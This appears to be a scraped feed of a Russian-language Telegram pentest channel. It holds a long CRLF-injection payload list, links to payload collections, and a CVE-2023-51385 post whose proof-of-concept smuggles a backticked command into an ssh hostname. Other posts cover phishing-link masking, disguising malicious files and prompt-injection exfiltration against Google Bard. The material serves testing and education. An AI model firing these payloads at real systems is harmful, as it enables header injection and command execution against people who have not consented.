#заметки
make-payloads.sh - replace www.example.com with a specific whitelisted domain in your test casePlease open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - cujanovic/Open-Redirect-Payloads: Open Redirect Payloads
Open Redirect Payloads. Contribute to cujanovic/Open-Redirect-Payloads development by creating an account on GitHub.
Как правило, домен на базе Active Directory обладает значительным количеством объектов, свойств и связей между ними. В общем случае «вручную» выявить недостатки в настройке домена и на их основе построить вероятный вектор атаки является довольно трудоемкой задачей и справится с ней без вспомогательных программных средств не представляется возможным.
В настоящем материале будет представлен обзор некоторых программных средств, использующихся для автоматизированного построения вероятных атак в домене. Кроме того, будут рассмотрены некоторые подходы к улучшению уже имеющихся решений, а также предложен собственный алгоритм к выявлению наиболее приоритетных целей атак.
Please open Telegram to view this post
VIEW IN TELEGRAM
CRLF Injection Payloads
#заметки
🪄 @poxek
#заметки
%0AHeader-Test:POXEK
%0A%20Header-Test:POXEK
%20%0AHeader-Test:POXEK
%23%OAHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0AHeader-Test:POXEK
%3F%0AHeader-Test:POXEK
crlf%0AHeader-Test:POXEK
crlf%0A%20Header-Test:POXEK
crlf%20%0AHeader-Test:POXEK
crlf%23%OAHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:POXEK
crlf%3F%0AHeader-Test:POXEK
%0DHeader-Test:POXEK
%0D%20Header-Test:POXEK
%20%0DHeader-Test:POXEK
%23%0DHeader-Test:POXEK
%23%0AHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0DHeader-Test:POXEK
%3F%0DHeader-Test:POXEK
crlf%0DHeader-Test:POXEK
crlf%0D%20Header-Test:POXEK
crlf%20%0DHeader-Test:POXEK
crlf%23%0DHeader-Test:POXEK
crlf%23%0AHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:POXEK
crlf%3F%0DHeader-Test:POXEK
%0D%0AHeader-Test:POXEK
%0D%0A%20Header-Test:POXEK
%20%0D%0AHeader-Test:POXEK
%23%0D%0AHeader-Test:POXEK
\r\nHeader-Test:POXEK
\r\n Header-Test:POXEK
\r\n Header-Test:POXEK
%5cr%5cnHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:POXEK
%3F%0D%0AHeader-Test:POXEK
crlf%0D%0AHeader-Test:POXEK
crlf%0D%0A%20Header-Test:POXEK
crlf%20%0D%0AHeader-Test:POXEK
crlf%23%0D%0AHeader-Test:POXEK
crlf\r\nHeader-Test:POXEK
crlf%5cr%5cnHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:POXEK
crlf%3F%0D%0AHeader-Test:POXEK
%0D%0A%09Header-Test:POXEK
crlf%0D%0A%09Header-Test:POXEK
%250AHeader-Test:POXEK
%25250AHeader-Test:POXEK
%%0A0AHeader-Test:POXEK
%25%30AHeader-Test:POXEK
%25%30%61Header-Test:POXEK
%u000AHeader-Test:POXEK
//www.google.com/%2F%2E%2E%0D%0AHeader-Test:POXEK
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:POXEK
/google.com/%2F..%0D%0AHeader-Test:POXEK
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤2👎1
Forwarded from Пост Лукацкого
Картинка из утренней заметки, а то вдруг вы ее пропустили или посчитали неинтересной аннотацию 😊
Коллекция полезных нагрузок BurpSuite Intruder, полезных нагрузок BurpBounty, списков fuzz листов и методов пентеста. Чтобы собрать все сторонние репозитории, запустите
install.sh в той же директории, где находится папка IntruderPayloads.Please open Telegram to view this post
VIEW IN TELEGRAM
☃7❤2👎1
Forwarded from PWN AI
Вот и первый выпуск дайджеста по безопасности ИИ. Материалы честно позаимствованы с hackstery, что-то дополнено и адаптировано. Но надеюсь, вы поставите
Wunderwuzzi написал статью и выложил PoC для эксфильтрации данных через Google Bard. Он реализовал эксфильтрацию в google docs и обошёл CSP, однако Google уже пофиксили это (((
Layier.AI выпустили свой бенчмарк, в котором при помощи нескольких сканеров промтов оценивается - как тот или иной сканер отработает на Prompt Injection. Среди средств анализа включены следующие инструменты - LLMGuard, Lakera Guard и RebuffAI. Подробнее о том, почему они это сделали – читайте в их статье. Также, они улучшили свою модель Deberta, которая используется для обнаружения Prompt Injection.
Компания Meta* выпустила новые инструменты (Llama Guard и Purple Llama) для защиты входных и выходных данных при взаимодействии с большими языковыми моделями и предложила эталон для оценки рисков кибербезопасности в моделях. (тык, тык и тык)
Huntr написали статью для багхантинга в AI/ML. Часть инструментов вы и сами знаете, а часть была описана в этом канале.
Google выпустил инструмент для подписей моделей через Sigstore. Это фреймворк для обеспечения безопасности цепочки поставок машинного обучения.
Trail Of Bits обнаружили 11 уязвимостей в популярной модели для обнаружения объектов в реальном времени YOLOv7. Snyk уже может сканировать эту модель на уязвимости.
Среди этих уязвимостей есть целых 5 RCE.
Для обнаружения исследователи использовали свой набор правил для semgrep, TorchScript и CodeQl.
Помимо этого, они дали рекомендации по защите модели и уже сообщили разработчикам о данных находках.
Cisco выпустила своего AI-ассистента. Этот инструмент призван помочь безопасникам в настройке и поддержке политик брандмауэра в решениях Cisco. Ранее также Microsoft сделали свой Security Copilot
Кто контролирует OpenAI - статья от Bloomberg
Заменит ли ИИ безопасника
Жду ваших репостов и комментариев на этот счёт
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👎1😈1 1
Что такое фишинг, знает и стар и млад, но пользователи все равно продолжают попадаться на уловки злоумышленников. В этой статье мы рассмотрим фишинговые ссылки, а точнее, способы их маскировки с использованием официальных сайтов известных компаний и сервисов.
Открытым редиректом в «1С‑Битрикс» уже никого не удивишь. Давай лучше рассмотрим, как киберпреступники умудряются использовать archive.org, evernote.com, bing.com, microsoft.com, adobe.com и другие трастовые домены для того, чтобы обмануть доверчивых пользователей.
Please open Telegram to view this post
VIEW IN TELEGRAM
☃5🎄1 1
По статистике значительная часть заражений малварью происходит из‑за того, что пользователь сам запустил на своей машине вредоносный файл. Именно в этом и заключается основная задача злоумышленников, использующих социальную инженерию. Давай посмотрим, какие технические уловки и хитрости они применяют.
Мы рассмотрим атаки с файлами не с точки зрения того, как их доставляют во время пентеста и что в них пишут, чтобы пользователь повелся. Об этом мы поговорим в другой раз. Сегодня мы коснемся нескольких технических аспектов, включая маскировку файлов и расширений, и обсудим некоторые лайфхаки.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8 2
#лаба
Спонтанный пост для тех, кто ищет чем заняться на выходных)
Полезная головоломка для начинающих специалистов и "повторение - мать учения" для прожжённых самоварчиков.
Смысл сей авантюры в том, что вы с 0 до 34 уровня должны подключаться по ssh к следующему уровню. А как это сделать вам и придется выяснить :))
Эта игра будет полезна в первую очередь для начинающих в освоении Linux на базовом уровне и по ходу решения уровней, сможете постигать тонкости нативных утилит.
ssh [email protected] -p 2220Please open Telegram to view this post
VIEW IN TELEGRAM
SSH ProxyCommand == RCE
CVE-2023-51385
#RCE
SSH’s ProxyCommand is a feature quite widely used to proxy ssh connections by allowing to specify custom commands to be used to connect to the server. Arguments to this directive may contain tokens like
When coming from untrusted sources, a hostname can be malicious and look something like
Malicious config:
Latest PoC:
Exploit: https://github.com/vin01/poc-proxycommand-vulnerable-v2
For Remediation you need update to:
OpenSSH 9.6p1
libssh 0.10.6 and 0.9.8
🌚 @poxek
CVE-2023-51385
#RCE
SSH’s ProxyCommand is a feature quite widely used to proxy ssh connections by allowing to specify custom commands to be used to connect to the server. Arguments to this directive may contain tokens like
%h, %u which refer to hostname and username respectively.When coming from untrusted sources, a hostname can be malicious and look something like
malicious-command (backticks would allow a command to be executed in shell)Malicious config:
Host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Latest PoC:
url = ssh://'`open -aCalculator`'foo.example.com/bar
Exploit: https://github.com/vin01/poc-proxycommand-vulnerable-v2
For Remediation you need update to:
OpenSSH 9.6p1
libssh 0.10.6 and 0.9.8
Please open Telegram to view this post
VIEW IN TELEGRAM
👎10 8❤3 3
Forwarded from AKTIV.CONSULTING
Ведущие Анастасия Харыбина, Тимофей Матреницкий и приглашенный эксперт Алексей Петухов обсудили одну из самых актуальных тем для многих компаний — проблему кадрового голода
Участники подкаста рассмотрели:
Смотрите и слушайте, где вам будет удобно:
Приятного просмотра
#подкаст
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
Автор захотел поделиться своим опытом участия в программе баг-хантинга ГК Астра (да, да - именно той, которая недавно совершила
Опыта участия в публичных программах поиска багов у него до этого не было, а первичной мотивацией было стремление посмотреть на Astra Linux в контексте информационной безопасности и в целом оценить собственные возможности в поиске дефектов данной ОС, ведь за плечами у него уже был богатый опыт ковыряния ядра да и вообще, линуксов.
Please open Telegram to view this post
VIEW IN TELEGRAM
#linux #LPE
Если кратко, то скрипт на PowerShell парсит логи на наличие данных авторизации. На первый взгляд классная штука.
Как получится воспользоваться на проекте, отпишу фидбек)
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥9❤1 1
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
Продолжаем разговор про тестирование API. На этот раз не будет докера, мне было максимально лениво разбираться с Rust
Инструмент, которым я буду сам пользоваться называется CherryBomb.
- Написан на Rust
- Имеет варианты запуска (info, normal, intrusive(не работает) , passive, full
- Требуется файл OpenAPI v3 в формате json (можете ваши yml переводить в него тут)
📌
Тестирование проводил всё на том же VAmPI
cherrybomb --file openapi.json --profile full --ignore-tls-errors true -o report.json --format json
Жаль, что я не могу делать развёрнутые посты с несколькими скринами и подобным, но если кратко - умеет в читаемый вид (table), а также в формате json
📌
В скором времени напишу парсер в sarif или для defect dojo
#opensource #devsecops
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12❤2 2
Forwarded from PRO:PENTEST
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17 2⚡1
Forwarded from BI.ZONE Bug Bounty
Мы думали-думали, что же такое особенное подарить нашей десятке лучших... А потом как придумали! На двух загадочных фото в посте — подсказка ;)
А это список самых крутых багхантеров на нашей платформе в 2023 году:
Хотим сказать спасибо всем, кто упорно багхантил на платформе весь год и поддерживал нас.
А всех из десятки от души поздравляем, в ближайшее время свяжемся и отправим подарки.
Stay tuned!
UPD
arkiix влетел в рейтинг уже после подведения итогов, так что наш топ-10 магией Деда Мороза превратился в топ-11. Так держать!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤🔥1🎄1 1